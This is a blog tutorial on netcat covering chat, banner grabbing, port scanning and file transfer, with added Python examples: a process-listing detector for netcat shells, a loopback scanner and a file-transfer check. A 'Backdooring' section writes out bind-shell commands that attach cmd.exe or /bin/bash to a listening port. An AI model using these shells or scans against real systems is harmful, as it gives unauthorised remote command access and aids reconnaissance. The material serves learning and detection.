Linux, InfoSec, Technology and Everything Else

Published: 6 months ago

Let’s Learn about Netcat

I am sure that if you are someone who likes playing around with networks, you must have heard of Netcat.
Netcat is a simple utility that reads and writes data across TCP or UDP network connections. It was released back in 1995 and has remained popular to this day. Despite its popularity it is no longer maintained; a different tool, ncat, has brought several serious updates to it, but here we'll talk about the old Swiss army knife, netcat.
What can it be used for?
Messaging Server - By using Netcat, an operator can redirect simple text between two computers in a simplistic chat.
File Transfers - Netcat allows you to transfer files between computers.
Banner Grabbing - Netcat allows an operator to establish a socket to a specific port to potentially identify the operating system, service, version and other information needed to enumerate the host's purpose and/or its potential weaknesses.
Port Scanning - Netcat allows the operator to use a rudimentary port scanning function, whereby a port or series of ports can be scanned to determine whether each port is open or closed.

Most Unix-based systems come with this utility preinstalled. However, you can also download and compile it from HERE. You can use it on Windows too (DOWNLOAD).

Sending Message

I will be using a virtual machine running BlackArch Linux, configured with bridged networking, to demonstrate this.

Launch a terminal (or a command prompt on Windows); in this case the listener operating system is BlackArch.
Type in the following command:
nc -vlp 8080
This command opens a listener on port 8080.
Now, to connect, you need the IP address of the listener; in my case it's 192.168.1.4.
Type the following command to connect to the listener:
nc 192.168.1.4 8080
Once connected, try sending a message from either of the connected machines; it might look something like this:
http://i.imgur.com/xITPJqb.png?1

Banner Grabbing

We can use netcat to grab information about the services running on specific ports of a host. To grab a banner, fire up a terminal and issue this command.

For a web server:

nc <host> <port>

GET / HTTP/1.0
[enter]
[enter]

You might get something like:

HTTP/1.0 200 OK
Date: Mon, 03 Feb 2014 07:29:47 GMT
Server: Apache/2.2.14 (Ubuntu)
Content-Length: 312
Connection: close
Content-Type: text/html; charset=iso-8859-1

To grab the banner of other ports/services use this; here I grabbed the banner of my local server:

nc -v -n <ip> <port>

I ran this on my local SSH server and it gave this output:

ketan@neX:~$ nc -v -n 127.0.0.1 22
(UNKNOWN) [127.0.0.1] 22 (ssh) open
SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu3.1.IS.10.04

Backdooring

Interestingly, netcat can also be used for backdooring. There are many reverse shell scripts that can be bound to a port so that an attacker can connect to it later, but here we'll use netcat for both listening and connecting.

If the target is Windows, you can use

nc -vlp 8080 -e cmd.exe

It will execute cmd.exe when another machine connects to it.

And if it's Unix, you can use

nc -vlp 8080 -e /bin/bash

To connect, simply use netcat to connect on port 8080, as in this case:
nc <ip> <port>

After that we can simply execute system commands through netcat.

http://i.imgur.com/HDT3ITe.png?1
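A defender's counterpart to the bind-shell commands above, as an added Python example that is not from the original post: a small checker that walks a process listing and flags netcat invocations that listen (-l, including clustered forms such as -vlp) or hand the connection to a program (-e), the two ingredients of the backdoor shown here. The process lines, PIDs and user names are constructed sample data; the option table assumes traditional netcat's short options (-p, -w, -e and friends take a value). Not every build has -e at all (the OpenBSD-derived nc omits it), so a listener without -e is still reported, at lower severity, rather than ignored.

```python
import re
import shlex

# Constructed sample process listing (not taken from the post): one
# "<pid> <user> <command line>" entry per process, the shape a
# `ps -eo pid,user,args` export or an EDR process-creation event gives you.
# The two backdoor command lines are the ones shown in the post.
SAMPLE_PROCESSES = [
    "1201 root /usr/sbin/sshd -D",
    "2310 www-data nc -vlp 8080 -e /bin/bash",
    "2315 ketan nc -v -n 127.0.0.1 22",
    "2402 ketan nc -v -w 30 -l -p 9000",
    "2511 SYSTEM nc.exe -vlp 8080 -e cmd.exe",
    "2600 ketan python3 app.py",
]

NETCAT_NAMES = {"nc", "netcat", "nc.exe", "ncat", "ncat.exe"}
# Short options that consume the following argument in traditional netcat
# (-p port, -w secs, -e prog, -s addr, -o hexfile, -q secs, -i secs).
# Assumption: the command lines use that build's spelling of the options.
TAKES_VALUE = set("pwesoqi")


def parse_netcat(cmdline):
    """Return (is_netcat, listens, exec_target) for one command line.

    Listen mode is recognised when 'l' appears in any single-dash option cluster,
    so '-l', '-vl' and '-vlp 8080' all count; the argument after an 'e' option is
    recorded as the program netcat would hand the connection to.
    """
    argv = shlex.split(cmdline)
    if not argv:
        return False, False, None
    program = re.split(r"[\\/]", argv[0])[-1].lower()
    if program not in NETCAT_NAMES:
        return False, False, None
    listens, exec_target = False, None
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg.startswith("-") and not arg.startswith("--") and len(arg) > 1:
            letters = arg[1:]
            if "l" in letters:
                listens = True
            if "e" in letters and i + 1 < len(argv):
                exec_target = argv[i + 1]
            if any(ch in TAKES_VALUE for ch in letters):
                i += 1  # skip the option's value so a port number is not reparsed
        i += 1
    return True, listens, exec_target


def classify(processes):
    """Flag netcat processes that listen and/or spawn a program. Returns
    (pid, user, severity, reason) tuples, highest severity first."""
    findings = []
    for line in processes:
        pid, user, cmdline = line.split(None, 2)
        is_nc, listens, exec_target = parse_netcat(cmdline)
        if not is_nc:
            continue
        if exec_target and listens:
            findings.append((pid, user, "high",
                             f"netcat listener handing connections to {exec_target} (bind shell)"))
        elif exec_target:
            findings.append((pid, user, "high",
                             f"outbound netcat handing the connection to {exec_target} (reverse shell)"))
        elif listens:
            findings.append((pid, user, "medium",
                             "netcat listener without -e (chat, file receive, or staging)"))
    rank = {"high": 0, "medium": 1}
    findings.sort(key=lambda f: rank[f[2]])
    return findings


if __name__ == "__main__":
    for pid, user, severity, reason in classify(SAMPLE_PROCESSES):
        print(f"{severity:<6} pid={pid} user={user}: {reason}")
```

The plain client invocation from the banner-grabbing section (nc -v -n 127.0.0.1 22) is deliberately not flagged: netcat is a normal administrative tool, and the signal worth paging on is the combination of a listener and a program attached to it, not the binary's presence.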

Port Scanning

When most people think of port scanners and port scanning capabilities, they generally don't think of Netcat in the same vein as tools like Nmap, Angry IP Scanner, or Foundstone's SuperScan. However, Netcat can perform basic port scanning and even offers the ability to obfuscate the source of the port scan.

To port scan, type this command in the terminal:

nc -v -w 1 <host> -z <port range>

For example, I ran it on my router and it gave this output:

nc -v -w 1 192.168.1.1 -z 1-100
ZXDSL [192.168.1.1] 80 (http) open
ZXDSL [192.168.1.1] 23 (telnet) open
ZXDSL [192.168.1.1] 22 (ssh) open
ZXDSL [192.168.1.1] 21 (ftp) open

 

The -v is for verbosity, which in our port scan reports the open ports that the scan uncovers. The -w parameter tells Netcat to wait one second between scan attempts, or in other words, how long it should wait for a port to respond as open or closed. Next is the target we want to scan, which in this example is 192.168.1.1. The -z switch is new and tells Netcat to operate in zero I/O mode. Zero I/O mode, in this case, speeds up the port scan by ignoring any latency baked in by the program to account for delays by the CPU. Finally, we specify the range, which in this case is 1-100.
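To make the banner-grabbing and port-scanning sections concrete in code, here is an added Python example (not part of the original post) that reproduces what nc -z -w 1 and the GET / HTTP/1.0 probe do with plain sockets: a connect scan that opens each port and closes without sending a byte, then a banner grab that either reads what the service volunteers (SSH) or sends a request first (HTTP) and pulls out the Server header. Because it has to run offline, two loopback threads stand in for the router and the web/SSH servers and answer with banners modelled on the post's sample output; the ports and responses are constructed, not captured from a real host.

```python
import socket
import threading

# Constructed banners modelled on the sample output in the post; not captured from a real host.
HTTP_RESPONSE = (
    b"HTTP/1.0 200 OK\r\n"
    b"Server: Apache/2.2.14 (Ubuntu)\r\n"
    b"Content-Length: 0\r\n"
    b"Connection: close\r\n"
    b"Content-Type: text/html; charset=iso-8859-1\r\n\r\n"
)
SSH_BANNER = b"SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu3.1\r\n"


def start_fake_service(banner, speaks_first):
    """Loopback stand-in for a real service; returns the port it listens on.
    speaks_first=True behaves like SSH (banner sent as soon as you connect);
    False behaves like HTTP (waits for a request line, then answers)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def run():
        while True:
            conn, _ = srv.accept()
            with conn:
                try:
                    # A zero-I/O probe closes without sending; recv() then returns b""
                    # and the HTTP-style service answers nothing, just like a real one.
                    if not speaks_first and not conn.recv(1024):
                        continue
                    conn.sendall(banner)
                except OSError:
                    pass  # peer already gone

    threading.Thread(target=run, daemon=True).start()
    return port


def unused_port():
    """Grab an ephemeral port and release it so the scan has a closed port to hit."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def scan(host, ports, timeout=1.0):
    """TCP connect scan, the equivalent of `nc -v -w <timeout> -z <host> <ports>`:
    complete the handshake, record the verdict, close without sending any data.
    Refused, timed-out and unreachable ports all count as not open."""
    open_ports = []
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                open_ports.append(port)
        except OSError:
            pass
    return sorted(open_ports)


def grab_banner(host, port, probe=None, timeout=2.0):
    """Connect and read the service's first bytes. Send `probe` first for services
    that wait for the client (HTTP); send nothing for ones that speak first (SSH)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        data = s.recv(4096)
    return data.decode("latin-1", "replace")


def http_server_header(host, port):
    """The `GET / HTTP/1.0` probe from the post, reduced to the Server header value."""
    response = grab_banner(host, port, probe=b"GET / HTTP/1.0\r\n\r\n")
    for line in response.split("\r\n"):
        if line.lower().startswith("server:"):
            return line.split(":", 1)[1].strip()
    return None


def run_demo():
    host = "127.0.0.1"
    http_port = start_fake_service(HTTP_RESPONSE, speaks_first=False)
    ssh_port = start_fake_service(SSH_BANNER, speaks_first=True)
    closed_port = unused_port()
    found = scan(host, [closed_port, ssh_port, http_port])
    return {
        "expected_open": sorted([http_port, ssh_port]),
        "open": found,
        "closed_port": closed_port,
        "ssh_banner": grab_banner(host, ssh_port).split("\r\n")[0],
        "http_server": http_server_header(host, http_port),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Treat whatever comes back as a claim made by the remote end: a banner can be edited or switched off, and a timeout on a port only says that nothing answered within the window (filtered or slow), not that the port is closed; the scan records refused and timed-out ports the same way, as nc -z does.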

Sending Files

Netcat can be used to send files between a server and a client without the hassle of setting up an FTP server, using just a couple of commands.

Start the listener with the following command; make sure the file (database.file here) is in the directory from which the command is executed:
nc -v -w 30 -l -p <port> > database.file
and on the client side:
nc -v -w 2 <ip> <port> < database.file
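The same transfer done with raw sockets, as an added Python example that is not the post's own code: the listener writes everything it receives to disk until the sender closes the connection, mirroring nc -l -p <port> > file on one side and nc <host> <port> < file on the other, and the two sides then compare SHA-256 digests, because netcat itself gives you no integrity check, no authentication and no encryption. The payload is random bytes written to a temporary directory, the timeout values stand in for -w, and everything runs over loopback.

```python
import hashlib
import os
import socket
import tempfile
import threading

CHUNK = 65536


def sha256_of(path):
    """Digest a file in chunks so large transfers do not have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            digest.update(chunk)
    return digest.hexdigest()


def receive_to_file(dst_path, timeout=30.0):
    """Listener side, the analogue of `nc -v -w 30 -l -p <port> > database.file`:
    accept one connection and write every byte it sends to dst_path until the
    peer closes. The timeout mirrors -w: give up if nobody connects or the sender
    stalls, instead of holding the port open forever. Returns (port, thread)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    srv.settimeout(timeout)
    port = srv.getsockname()[1]

    def run():
        with srv:
            conn, _ = srv.accept()
        conn.settimeout(timeout)
        with conn, open(dst_path, "wb") as out:
            while True:
                chunk = conn.recv(CHUNK)
                if not chunk:  # peer closed: the only end-of-file signal there is
                    break
                out.write(chunk)

    thread = threading.Thread(target=run)
    thread.start()
    return port, thread


def send_file(src_path, host, port, timeout=2.0):
    """Client side, the analogue of `nc -v -w 2 <ip> <port> < database.file`:
    stream the file, then close the connection to mark the end. Returns bytes sent."""
    sent = 0
    with socket.create_connection((host, port), timeout=timeout) as s, open(src_path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            s.sendall(chunk)
            sent += len(chunk)
    return sent


def transfer_demo(size=300_000):
    """Round-trip a constructed file over loopback and verify it end to end."""
    with tempfile.TemporaryDirectory() as workdir:
        src = os.path.join(workdir, "database.file")
        dst = os.path.join(workdir, "database.file.received")
        with open(src, "wb") as f:
            f.write(os.urandom(size))  # constructed payload, not a real database
        port, receiver = receive_to_file(dst)
        sent = send_file(src, "127.0.0.1", port)
        receiver.join()
        return {
            "sent": sent,
            "received": os.path.getsize(dst),
            "intact": sha256_of(src) == sha256_of(dst),
        }


if __name__ == "__main__":
    print(transfer_demo())
```

Two things this makes visible that the two one-liners hide: the receiver cannot tell a complete file from a truncated one except by the sender closing the socket, so a digest compared out of band is the minimum check worth doing, and without a timeout the listening side simply waits forever if the sender never shows up.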

 

So I hope you enjoyed this post; if you want to tell me anything, you can use the comments :D

 
